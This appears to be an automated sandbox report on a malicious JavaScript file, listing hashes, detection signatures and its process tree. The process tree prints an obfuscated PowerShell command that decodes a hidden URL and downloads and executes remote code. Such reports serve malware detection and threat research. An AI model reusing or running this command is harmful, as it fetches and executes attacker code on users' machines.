Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
21-12-2024 15:07
General
-
Target
71075e76f94c759f85f68b8357ae000a34ed2add03a861987a665068b12c8d29.js
-
Size
227KB
-
MD5
456351d25f2493ebd899799fcee37544
-
SHA1
0a98c1dda575e27bb37eca290e659ad396cbfd4e
-
SHA256
71075e76f94c759f85f68b8357ae000a34ed2add03a861987a665068b12c8d29
-
SHA512
f1c29c6a97df557695c65756c8e6412f61eb06173b3a77e68cb4b7cc71f8f68c4d36cd698f3df1d493c9f03e8a578c23a311b4027f10697fb9cf1c21705e244c
-
SSDEEP
1536:nwg44SilsIL6nyHaRuIuA3uJ6rdyNaEW8wljVt6nyHaRuIuA3uJQrdyNaEW8wljz:nzPxPU/8GJG/oGJeGJC/A/X
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\71075e76f94c759f85f68b8357ae000a34ed2add03a861987a665068b12c8d29.js1⤵
-
C:\Windows\system32\conhost.execonhost --headless powershell $kjdfgi='ur' ;new-alias printout c$($kjdfgi)l;$bpdwgx=(1996,2007,2015,1999,2001,1996,2016,2015,2020,1953,2015,1949,1996,1944,2014,2009,2010,1945,1947,1944,2010,2002,2010,1961,2013,1959,2007,2003,2008,2014,2013,1948,1947);$giranp=('bronx','get-cmdlet');$gmoliv=$bpdwgx;foreach($zlevrohfq in $gmoliv){$pjmzai=$zlevrohfq;$xnshzoerkdty=$xnshzoerkdty+[char]($pjmzai-1898);$noqvipxstwbcl=$xnshzoerkdty; $yrjalpm=$noqvipxstwbcl};$uvtkpl[2]=$yrjalpm;$wuzfejc='rl';$xizbfskonvqydh=1;.$([char](9992-9887)+'e'+'x')(printout -useb $yrjalpm)1⤵
- Process spawned unexpected child process